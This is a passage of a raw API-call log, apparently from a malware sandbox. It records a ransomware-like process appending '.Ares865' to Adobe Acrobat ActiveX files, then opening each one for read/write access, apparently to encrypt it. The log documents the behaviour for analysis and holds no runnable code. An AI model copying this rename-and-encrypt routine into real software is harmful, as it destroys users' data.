(x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.FRA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.fra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.893] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312832) returned 1 [0152.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.893] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.913] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.HRV" | out: lpString1="AcroPDF.HRV") returned="AcroPDF.HRV" [0152.913] lstrlenW (lpString="AcroPDF.HRV") returned 11 [0152.913] lstrlenW (lpString="Ares865") returned 7 [0152.913] lstrcmpiW (lpString1="PDF.HRV", lpString2="Ares865") returned 1 [0152.913] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV.Ares865") returned 77 [0152.913] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hrv"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hrv.ares865"), dwFlags=0x1) returned 1 [0152.916] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HRV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hrv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.916] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0152.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.916] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.935] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.HUN" | out: lpString1="AcroPDF.HUN") returned="AcroPDF.HUN" [0152.935] lstrlenW (lpString="AcroPDF.HUN") returned 11 [0152.935] lstrlenW (lpString="Ares865") returned 7 [0152.935] lstrcmpiW (lpString1="PDF.HUN", lpString2="Ares865") returned 1 [0152.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN.Ares865") returned 77 [0152.936] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hun"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hun.ares865"), dwFlags=0x1) returned 1 [0152.939] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.HUN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.hun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0152.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.959] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.ITA" | out: lpString1="AcroPDF.ITA") returned="AcroPDF.ITA" [0152.959] lstrlenW (lpString="AcroPDF.ITA") returned 11 [0152.959] lstrlenW (lpString="Ares865") returned 7 [0152.959] lstrcmpiW (lpString1="PDF.ITA", lpString2="Ares865") returned 1 [0152.959] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA.Ares865") returned 77 [0152.959] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ita"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ita.ares865"), dwFlags=0x1) returned 1 [0152.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.ITA.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ita.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.969] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312832) returned 1 [0152.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.970] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.970] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.992] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.JPN" | out: lpString1="AcroPDF.JPN") returned="AcroPDF.JPN" [0152.992] lstrlenW (lpString="AcroPDF.JPN") returned 11 [0152.992] lstrlenW (lpString="Ares865") returned 7 [0152.992] lstrcmpiW (lpString1="PDF.JPN", lpString2="Ares865") returned 1 [0152.992] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN.Ares865") returned 77 [0152.992] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.jpn"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.jpn.ares865"), dwFlags=0x1) returned 1 [0152.995] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.JPN.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.jpn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.995] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=310784) returned 1 [0152.995] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.995] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.995] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.014] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.KOR" | out: lpString1="AcroPDF.KOR") returned="AcroPDF.KOR" [0153.014] lstrlenW (lpString="AcroPDF.KOR") returned 11 [0153.014] lstrlenW (lpString="Ares865") returned 7 [0153.014] lstrcmpiW (lpString1="PDF.KOR", lpString2="Ares865") returned 1 [0153.014] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR.Ares865") returned 77 [0153.014] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.kor"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.kor.ares865"), dwFlags=0x1) returned 1 [0153.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.KOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.kor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=310784) returned 1 [0153.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.036] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.NLD" | out: lpString1="AcroPDF.NLD") returned="AcroPDF.NLD" [0153.036] lstrlenW (lpString="AcroPDF.NLD") returned 11 [0153.036] lstrlenW (lpString="Ares865") returned 7 [0153.037] lstrcmpiW (lpString1="PDF.NLD", lpString2="Ares865") returned 1 [0153.037] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD.Ares865") returned 77 [0153.037] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nld"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nld.ares865"), dwFlags=0x1) returned 1 [0153.039] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NLD.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nld.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.039] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312832) returned 1 [0153.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.061] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.NOR" | out: lpString1="AcroPDF.NOR") returned="AcroPDF.NOR" [0153.061] lstrlenW (lpString="AcroPDF.NOR") returned 11 [0153.061] lstrlenW (lpString="Ares865") returned 7 [0153.061] lstrcmpiW (lpString1="PDF.NOR", lpString2="Ares865") returned 1 [0153.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR.Ares865") returned 77 [0153.061] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nor"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nor.ares865"), dwFlags=0x1) returned 1 [0153.064] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.NOR.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.nor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.064] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.064] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.064] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.064] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.083] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.POL" | out: lpString1="AcroPDF.POL") returned="AcroPDF.POL" [0153.083] lstrlenW (lpString="AcroPDF.POL") returned 11 [0153.083] lstrlenW (lpString="Ares865") returned 7 [0153.083] lstrcmpiW (lpString1="PDF.POL", lpString2="Ares865") returned 1 [0153.084] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL.Ares865") returned 77 [0153.084] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.pol"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.pol.ares865"), dwFlags=0x1) returned 1 [0153.086] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.POL.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.pol.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.086] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.086] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.086] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.107] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.PTB" | out: lpString1="AcroPDF.PTB") returned="AcroPDF.PTB" [0153.107] lstrlenW (lpString="AcroPDF.PTB") returned 11 [0153.107] lstrlenW (lpString="Ares865") returned 7 [0153.107] lstrcmpiW (lpString1="PDF.PTB", lpString2="Ares865") returned 1 [0153.107] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB.Ares865") returned 77 [0153.107] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ptb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ptb.ares865"), dwFlags=0x1) returned 1 [0153.111] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ptb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.111] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.129] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.RUM" | out: lpString1="AcroPDF.RUM") returned="AcroPDF.RUM" [0153.130] lstrlenW (lpString="AcroPDF.RUM") returned 11 [0153.130] lstrlenW (lpString="Ares865") returned 7 [0153.130] lstrcmpiW (lpString1="PDF.RUM", lpString2="Ares865") returned 1 [0153.130] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM.Ares865") returned 77 [0153.130] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rum"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rum.ares865"), dwFlags=0x1) returned 1 [0153.132] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rum.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.132] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.151] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.RUS" | out: lpString1="AcroPDF.RUS") returned="AcroPDF.RUS" [0153.151] lstrlenW (lpString="AcroPDF.RUS") returned 11 [0153.151] lstrlenW (lpString="Ares865") returned 7 [0153.151] lstrcmpiW (lpString1="PDF.RUS", lpString2="Ares865") returned 1 [0153.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS.Ares865") returned 77 [0153.152] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rus"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rus.ares865"), dwFlags=0x1) returned 1 [0153.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.174] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.SKY" | out: lpString1="AcroPDF.SKY") returned="AcroPDF.SKY" [0153.174] lstrlenW (lpString="AcroPDF.SKY") returned 11 [0153.174] lstrlenW (lpString="Ares865") returned 7 [0153.175] lstrcmpiW (lpString1="PDF.SKY", lpString2="Ares865") returned 1 [0153.175] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY.Ares865") returned 77 [0153.175] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sky"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sky.ares865"), dwFlags=0x1) returned 1 [0153.180] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sky.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.180] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.198] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.SLV" | out: lpString1="AcroPDF.SLV") returned="AcroPDF.SLV" [0153.198] lstrlenW (lpString="AcroPDF.SLV") returned 11 [0153.198] lstrlenW (lpString="Ares865") returned 7 [0153.198] lstrcmpiW (lpString1="PDF.SLV", lpString2="Ares865") returned 1 [0153.199] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV.Ares865") returned 77 [0153.199] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.slv"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.slv.ares865"), dwFlags=0x1) returned 1 [0153.201] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.slv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.220] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.SUO" | out: lpString1="AcroPDF.SUO") returned="AcroPDF.SUO" [0153.220] lstrlenW (lpString="AcroPDF.SUO") returned 11 [0153.220] lstrlenW (lpString="Ares865") returned 7 [0153.220] lstrcmpiW (lpString1="PDF.SUO", lpString2="Ares865") returned 1 [0153.220] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO.Ares865") returned 77 [0153.220] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.suo"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.suo.ares865"), dwFlags=0x1) returned 1 [0153.224] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.suo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0153.224] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=312320) returned 1 [0153.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0153.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0153.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0153.243] lstrcpyW (in: lpString1=0x2cce474, lpString2="AcroPDF.SVE" | out: lpString1="AcroPDF.SVE") returned="AcroPDF.SVE" [0153.243] lstrlenW (lpString="AcroPDF.SVE") returned 11 [0153.243] lstrlenW (lpString="Ares865") returned 7 [0153.243] lstrcmpiW (lpString1="PDF.SVE", lpString2="Ares865") returned 1 [0153.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE.Ares865") returned 77 [0153.243] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sve"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sve.ares865"), dwFlags=0x1) returned 1 [0153.246] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SVE.Ares865" (normalized: "c:\\program files (x86)\\common 